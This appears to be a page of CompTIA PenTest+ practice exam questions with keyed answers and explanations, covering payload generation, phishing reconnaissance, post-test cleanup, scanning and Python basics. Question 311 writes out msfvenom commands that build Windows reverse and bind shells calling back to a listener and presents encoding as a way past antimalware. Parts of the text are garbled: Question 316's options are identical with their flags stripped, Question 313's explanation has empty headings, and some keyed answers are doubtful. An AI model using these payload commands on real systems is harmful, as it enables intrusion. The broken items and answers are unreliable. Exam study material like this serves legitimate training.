CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 311:

  A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target.

  Which of the following commands should the tester use to obtain shell access?

  A. msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/ bind_tcp LPORT=443
  B. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000
  C. msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none
  D. net user add /administrator | hexdump > payload
  A. msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/ bind_tcp LPORT=443

  ---

  Explanation

  Using shikata_ga_nai:

  This encoder obfuscates the payload, making it harder for antimalware to detect.

  The command specifies a bind shell (windows/bind_tcp) payload, targeting Windows with architecture x86- 64.

  Why Not Other Options?

  Option B, Option C: These commands generate payloads but do not use an encoder, increasing the likelihood of detection by antimalware.

  Option D: This command is unrelated to generating shellcode; it appears to be an attempt to manipulate accounts.

  References:

  Domain 3.0 (Attacks and Exploits)

• Question 312:

  A company's incident response team determines that a breach occurred because a penetration tester left a web shell.

  Which of the following should the penetration tester have done after the engagement?

  A. Enable a host-based firewall on the machine
  B. Remove utilized persistence mechanisms on client systems
  C. Revert configuration changes made during the engagement
  D. Turn off command-and-control infrastructure
  B. Remove utilized persistence mechanisms on client systems

  ---

  Explanation

  The immediate and mandatory post-engagement action after completing an authorized penetration test is to remove any accounts, implants, backdoors, web shells, scheduled tasks, or other persistence mechanisms that were created or used during the test. Leaving persistence (a web shell in this case) is exactly what caused the breach and is an unacceptable post-test lapse.

  Why Option B is correct:

  Persistence mechanisms provide continued unauthorized access and are a direct security risk if not removed. Removing them returns the environment to its pre-test security posture and prevents later compromise by third parties.

  Removal of persistence is a standard requirement in rules of engagement and in post-test cleanup checklists.

  Why the other answers are incomplete or secondary:

  Option A: Enable a host-based firewall on the machine -- a reasonable defensive step if missing, but it does not replace removing the persistence that was the cause of the breach.

  Option C: Revert configuration changes made during the engagement -- also important and should be done, but the highest priority is removing active persistence that gives access. (Both B and C are valid cleanup activities; B is the single best answer given the question.)

  Option D: Turn off command-and-control infrastructure -- this is appropriate for the tester's own infrastructure, but the critical action on the client side is removing client-side persistence. Also, turning off

  C2 after the test is expected, but will not remediate the remaining web shell on the client.

  CompTIA PT0-003 Mapping:

  Domain 5.0 Reporting and Communication -- post-engagement cleanup and handoff (remediation actions, removal of test artifacts, maintaining chain of custody and evidence, and returning environment to agreed baseline).

• Question 313:

  A penetration tester needs to identify all vulnerable input fields on a customer website.

  Which of the following tools would be best suited to complete this request?

  A. DAST
  B. SAST
  C. IAST
  D. SCA
  A. DAST

  ---

  Explanation

  Dynamic Application Security Testing (DAST):

  Advantages of DAST:

  Examples of DAST Tools:

  Pentest References:

  Web Application Testing: Understanding the importance of testing web applications for security vulnerabilities and the role of different testing methodologies.

  Security Testing Tools: Familiarity with various security testing tools and their applications in penetration testing.

  DAST vs. SAST: Knowing the difference between DAST (dynamic testing) and SAST (static testing) and when to use each method. By using a DAST tool, the penetration tester can effectively identify all vulnerable input fields on the customer website, ensuring a thorough assessment of the application's security.

• Question 314:

  Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email.

  Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

  A. dig company.com MX
  B. whois company.com
  C. cur1 www.company.com
  D. dig company.com A
  A. dig company.com MX

  ---

  Explanation

  The dig command is a tool that can be used to query DNS servers and obtain information about domain names, such as IP addresses, mail servers, name servers, or other records. The MX option specifies that the query is for mail exchange records, which are records that indicate the mail servers responsible for accepting email messages for a domain. Therefore, the command dig company.com MX would best help the tester determine which cloud email provider the log-in page needs to mimic by showing the mail servers for company.com. For example, if the output shows something like company-com.mail.protection.outlook.com, then it means that company.com uses Microsoft Outlook as its cloud email provider. The other commands are not as useful for determining the cloud email provider. The whois command is a tool that can be used to query domain name registration information, such as the owner, registrar, or expiration date of a domain. The curl command is a tool that can be used to transfer data from or to a server using various protocols, such as HTTP, FTP, or SMTP. The dig command with the A option specifies that the query is for address records, which are records that map domain names to IP addresses.

• Question 315:

  Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?

  A. Dictionary
  B. Directory
  C. Symlink
  D. Catalog
  E. For-loop
  A. Dictionary

  ---

  Explanation

  A dictionary can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools. A dictionary is a collection of key-value pairs that can be accessed by using the keys. For example, a dictionary can store usernames and passwords, or IP addresses and hostnames, that can be used as input for brute-force or reconnaissance tools.

• Question 316:

  An assessor wants to use Nmap to help map out a stateful firewall rule set.

  Which of the following scans will the assessor MOST likely run?

  A. nmap 192.168.0.1/24
  B. nmap 192.168.0.1/24
  C. nmap oG 192.168.0.1/24
  D. nmap 192.168.0.1/24
  A. nmap 192.168.0.1/24

• Question 317:

  A penetration tester wants to automate adversarial activities so they can be executed repeatedly and measured consistently across different environments. The tester plans to validate detection and response capabilities by simulating attacker techniques mapped to known TTPs.

  Which of the following approaches should the tester implement first to achieve this goal?

  A. Deploy a command-and-control server with custom profiles to facilitate execution.
  B. Use Python 3 with added testing libraries and script the relevant action to test.
  C. Utilize the PowerShell PowerView tool with custom scripting additions based on test results.
  D. Implement Atomic Red Team to chain critical TTPs and perform the test.
  D. Implement Atomic Red Team to chain critical TTPs and perform the test.

  ---

  Explanation

  To automate adversarial activities in a repeatable, measurable way, PenTest+ emphasizes using frameworks that map directly to attacker behaviors (TTPs) and support consistent execution across environments. Atomic Red Team is designed specifically for this purpose: it provides standardized, modular tests aligned to common adversary techniques and allows defenders and testers to validate detection and response capabilities by repeatedly executing those behaviors in a controlled manner.

  Starting with Atomic Red Team helps translate lessons learned from penetration tests into an ongoing validation program by selecting only the techniques relevant to the organization's threat model and then chaining them into realistic sequences. This supports continuous security testing, regression checks after changes, and objective measurement of control effectiveness.

  By contrast, deploying a full command-and-control platform first increases operational complexity and risk without ensuring the activities are standardized or easily repeatable. Writing custom Python scripts or extending PowerView can work, but those approaches typically require more bespoke development and do not inherently provide a structured library of TTP tests that can be consistently run and reported. Atomic Red Team is the best first step for automation.

• Question 318:

  A consulting company is completing the ROE during scoping.

  Which of the following should be included in the ROE?

  A. Cost ofthe assessment
  B. Report distribution
  C. Testing restrictions
  D. Liability
  B. Report distribution

• Question 319:

  A penetration tester runs a network scan but has some issues accurately enumerating the vulnerabilities due to the following error:

  OS identification failed

  Which of the following is most likely causing this error?

  A. The scan did not reach the target because of a firewall block rule.
  B. The scanner database is out of date.
  C. The scan is reporting a false positive.
  D. The scan cannot gather one or more fingerprints from the target.
  D. The scan cannot gather one or more fingerprints from the target.

  ---

  Explanation

  OS identification in tools like Nmap relies on fingerprinting techniques, which analyze response characteristics (e.g., TCP/IP stack behavior).

  The scan cannot gather one or more fingerprints from the target (Option D):

  If the system is configured to block ICMP responses, or if certain ports are closed, fingerprinting fails.

  Some modern firewalls and intrusion prevention systems (IPS) interfere with OS fingerprinting by modifying packet responses.

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide - "Network Scanning and Fingerprinting Challenges"

  Incorrect options:

  Option A (Firewall block rule): A firewall may block the scan, but typically it would result in no response rather than an "OS identification failed" message.

  Option B (Outdated scanner database): While an outdated database might miss vulnerabilities, it does not directly cause OS detection failure.

  Option C (False positive): A false positive refers to incorrect detection, but this is an OS detection failure, not a misidentified OS.

• Question 320:

  Which of the following expressions in Python increase a variable val by one (Choose two.)

  A. val++
  B. +val
  C. val=(val+1)
  D. ++val
  E. val=val++
  F. val+=1
  C. val=(val+1)
  F. val+=1

  ---

  Explanation

  In Python, there are two ways to increase a variable by one: using the assignment operator (=) with an arithmetic expression, or using the augmented assignment operator (+=). The expressions val=(val+1) and val+=1 both achieve this goal. The expressions val++ and ++val are not valid in Python, as there is no increment operator. The expressions +val and val=val++ do not change the value of val 2.

  https://pythonguides.com/increment-and-decrement-operators-in-python/